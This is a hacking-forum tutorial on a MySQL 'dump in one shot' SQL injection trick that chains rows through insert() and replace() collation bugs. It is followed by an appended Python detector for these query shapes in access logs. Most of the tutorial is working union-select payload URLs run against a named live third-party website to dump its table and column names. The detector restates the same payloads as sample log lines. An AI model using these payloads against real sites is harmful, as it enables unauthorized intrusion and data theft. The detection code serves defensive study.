New kind of dios using UTF-8 bug By Benzi

toc
-intro
-insert()
-replace()

intro
up to now, to perform a dios query, we used a local variable.
today, i will show you a way to dump the whole table without a local variable.
but i wanna talk about the bug first.
in mysql, theres a bug: if theres a utf8 column and you replace some of its content with other utf8/binary content, the webserver wont delete the previous content.
for example, lets say i have a table named "books" with the column "color".
Code:
SELECT `color` FROM `books`;
red
green
blue

if i wanna add "!" after the word, i can do it by using the insert() function.
Code:
SELECT insert("!",1,0,color) FROM books;
red!
green!
blue!

but what if i use 0x21 instead of "!"?
Code:
SELECT insert(0x21,1,0,color) FROM books;
red!
greenred!
bluegreenred!

we got us a bug.
as we can see, the rows are being concatenated to each other, and the last row contains all the records.
so what if we use information_schema instead?
Code:
SELECT insert(0x21,1,0,table_name) FROM information_schema 0.e.tables where table_schema not like 'inf%';
table1!
table2table1!
table3table2table1!

why is this happening?
collation('!') = latin1
collation(0x21) = binary
collation(table_name) = utf8.
apparently mysql 5.1+ cant handle a mix of utf8 and binary.

a few docs on bugs.mysql.com:
https://bugs.mysql.com/bug.php?id=49271
https://bugs.mysql.com/bug.php?id=7642
https://bugs.mysql.com/bug.php?id=12351
https://bugs.mysql.com/bug.php?id=16716
https://bugs.mysql.com/bug.php?id=69891
https://bugs.mysql.com/bug.php?id=64338
https://bugs.mysql.com/bug.php?id=9011
https://bugs.mysql.com/bug.php?id=7874
https://bugs.mysql.com/bug.php?id=10572
https://bugs.mysql.com/bug.php?id=3796
https://bugs.mysql.com/bug.php?id=8785
https://bugs.mysql.com/bug.php?id=38980

insert()
as we saw in the intro, we can perform dios using insert().
now i will demonstrate on a live site.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,4

lets try to see if the bug exists.
on this site, theres the 1267 (illegal mix) bug, so i will use unhex(hex()).
its ironic, because 1267 is supposed to be a fix for that bug. :)
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,insert(0x1,1,0,unhex(hex(table_name))) from information_schema 0.e.tables

[Image: YzwUKo1.png]

as we can see, each row contains the previous row.
which means the last row contains all the data.
but how can we see only the last row?
well, with limit.
first, we will count the tables, and view the last row by using "limit count-1,1".
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,count(*) from information_schema 0.e.tables
59, which means limit 58,1.
we decrease by one because the counting starts at 0.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,insert(0x1,1,0,unhex(hex(table_name))) from information_schema 0.e.tables limit 58,1

[Image: zMS8jfV.png]

all the tables.
lets arrange it a bit.
we need to fix 3 things-
*the output is backwards
*make it more normal to look
*add columns.

to overcome the first problem, we will add a "reverse" function on the table_name, and another one on the whole insert().
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,reverse(insert(0x1,1,0,reverse(unhex(hex(table_name))))) FROM information_schema 0.e.tables limit 58,1

for the 2nd and 3rd problems, we will add "concat", and add column_name and <br>.
the count(*) from columns is 612, so-
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,count(*) FROM information_schema.columns
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,reverse(insert(0x1,1,0,reverse(concat (unhex(hex(table_name)),0x203a20,unhex(hex(column_name)),0x3c62723e)))) from information_schema 0.e.columns limit 611,1

[Image: oFM9VDx.png]

perfect.

replace()
in replace(), we just need to find a utf8 column and replace the content of that column with the content we want.
fortunately, all the system variables are utf8.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,replace(@@version,5,@@version) from information_schema 0.e.tables

[Image: caua5BC.png]

same bug.
now we will replace the second @@version with the table_name and column_name concatenated to @@version, and instead of '5', i will put @@version, to clean our field.
be sure to concat @@version, because we need it to be utf8.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,replace(@@version,@@version,concat (unhex(hex(table_name)),0x203a20,unhex(hex(column_name)),0x3c62723e,@@version)) from information_schema 0.e.columns limit 611,1

[Image: hCcfMY6.png]

did i say perfect? i believe so. ;)
hope you learned something. :)
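From the defender's side, the query shapes shown in both sections (insert(0x..,1,0,col) and replace(@@version,...) chaining, the unhex(hex()) wrapper, information_schema access, and the "limit count-1,1" last-row trick) are easy to spot in web access logs. The following is an added example, not code from the original post: a small Python detector that URL-decodes each request and reports which of those indicators it contains. The log lines and the /page.php path are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns for the query shapes discussed in the post. Matching is done
# on the URL-decoded, lower-cased request so %20/+ encoding and case do not hide them.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b.*?\bselect\b")),
    ("information_schema", re.compile(r"information_schema")),
    # insert(0x.., 1, 0, <utf8 col>) used to chain rows into the last row
    ("insert_hex_chain", re.compile(r"\binsert\s*\(\s*0x[0-9a-f]+\s*,")),
    # replace(@@sysvar, ...) variant that uses a utf8 system variable as the anchor
    ("replace_sysvar", re.compile(r"\breplace\s*\(\s*@@\w+\s*,")),
    # unhex(hex(...)) wrapper used to sidestep the 1267 'illegal mix' error
    ("unhex_hex_wrap", re.compile(r"\bunhex\s*\(\s*hex\s*\(")),
    # "limit N,1" selecting only the last (fully chained) row
    ("limit_last_row", re.compile(r"\blimit\s+\d+\s*,\s*1\b")),
]

def classify_request(raw_url: str) -> list[str]:
    """Return the names of all indicators found in one raw request line or URL."""
    decoded = unquote_plus(raw_url).lower()
    return [name for name, rx in INDICATORS if rx.search(decoded)]

def scan_log(lines):
    """Yield (line_no, indicator_names) for every log line with at least one hit.

    A lone union_select or information_schema hit is worth a look; combined with
    one of the row-chaining indicators it is the strong signal for this technique."""
    for no, line in enumerate(lines, 1):
        hits = classify_request(line)
        if hits:
            yield no, hits

# Constructed sample access-log lines (placeholder host-less paths, fake IPs).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:00:00:00 +0000] "GET /page.php?id=4 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:00:00:01 +0000] "GET /page.php?id=4%20and%200%20union%20select%201,2,3,'
    'insert(0x1,1,0,unhex(hex(table_name)))%20from%20information_schema.tables%20limit%2058,1 HTTP/1.1" 200 9001',
    '10.0.0.9 - - [01/Jan/2020:00:00:02 +0000] "GET /page.php?id=4+and+0+union+select+1,2,3,'
    'replace(@@version,@@version,concat(unhex(hex(table_name)),0x203a20,@@version))+from+information_schema.columns+limit+611,1 HTTP/1.1" 200 9001',
]

def suspicious_lines(lines=SAMPLE_LOG) -> dict[int, list[str]]:
    """Collect flagged lines as {line_no: [indicators]} for alerting or assertions."""
    return {no: hits for no, hits in scan_log(lines)}

if __name__ == "__main__":
    for no, hits in suspicious_lines().items():
        print(f"line {no}: {', '.join(hits)}")
```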